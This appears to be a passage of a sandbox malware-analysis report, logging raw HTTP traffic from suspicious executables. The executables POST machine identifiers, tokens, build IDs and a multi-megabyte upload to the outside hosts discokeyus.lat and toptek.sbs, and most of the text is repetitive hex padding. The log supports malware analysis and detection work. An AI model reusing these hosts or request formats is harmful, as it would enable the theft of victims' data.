                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:39 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:41 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-12-21 21:17:41 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            43192.168.2.449894104.21.21.99443280C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:17:40 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=0WUOQ9JDCE706RKZZ
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 8778
                                                                                                                                                                                                                                                            Host: discokeyus.lat
                                                                                                                                                                                                                                                            2024-12-21 21:17:40 UTC8778OUTData Raw: 2d 2d 30 57 55 4f 51 39 4a 44 43 45 37 30 36 52 4b 5a 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 30 57 55 4f 51 39 4a 44 43 45 37 30 36 52 4b 5a 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 57 55 4f 51 39 4a 44 43 45 37 30 36 52 4b 5a 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d
                                                                                                                                                                                                                                                            Data Ascii: --0WUOQ9JDCE706RKZZContent-Disposition: form-data; name="hwid"ACBF7AD21FC990D4AC8923850305D13E--0WUOQ9JDCE706RKZZContent-Disposition: form-data; name="pid"2--0WUOQ9JDCE706RKZZContent-Disposition: form-data; name="lid"PsFKDg--pablo-
                                                                                                                                                                                                                                                            2024-12-21 21:17:42 UTC1134INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=rcd4cbsp6a40g74gc6kp6c2nkk; expires=Wed, 16 Apr 2025 15:04:20 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=66%2FKBx3Yh7YizetSvfMQomuyCXNuKbrKhEI34WzQ%2BFMwIN3xgfKVYKVZl84hhkBxuDCvlX4WedAcKcjJ%2Bru3WW6sl9jw%2BS30j7C%2FGRLlOI7%2Bkmguc1q6axXKxhVRbet9TQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae67bad7c0ca2-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1985&min_rtt=1537&rtt_var=896&sent=10&recv=13&lost=0&retrans=0&sent_bytes=2833&recv_bytes=9714&delivery_rate=1899804&cwnd=32&unsent_bytes=0&cid=e5d3f92f7d764cbb&ts=1347&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:17:42 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2024-12-21 21:17:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            44192.168.2.44989594.130.188.574432792C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:17:41 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----47GLNO8GLN7QIM7Q9HDT
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                            Host: toptek.sbs
                                                                                                                                                                                                                                                            Content-Length: 6990993
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-12-21 21:17:41 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 34 37 47 4c 4e 4f 38 47 4c 4e 37 51 49 4d 37 51 39 48 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 33 64 62 62 38 36 33 66 65 33 63 37 33 62 36 36 32 62 36 31 63 63 65 30 34 38 33 32 65 62 32 0d 0a 2d 2d 2d 2d 2d 2d 34 37 47 4c 4e 4f 38 47 4c 4e 37 51 49 4d 37 51 39 48 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 34 37 47 4c 4e 4f 38 47 4c 4e 37 51 49 4d 37 51 39 48 44 54 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                            Data Ascii: ------47GLNO8GLN7QIM7Q9HDTContent-Disposition: form-data; name="token"53dbb863fe3c73b662b61cce04832eb2------47GLNO8GLN7QIM7Q9HDTContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------47GLNO8GLN7QIM7Q9HDTCont
                                                                                                                                                                                                                                                            2024-12-21 21:17:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
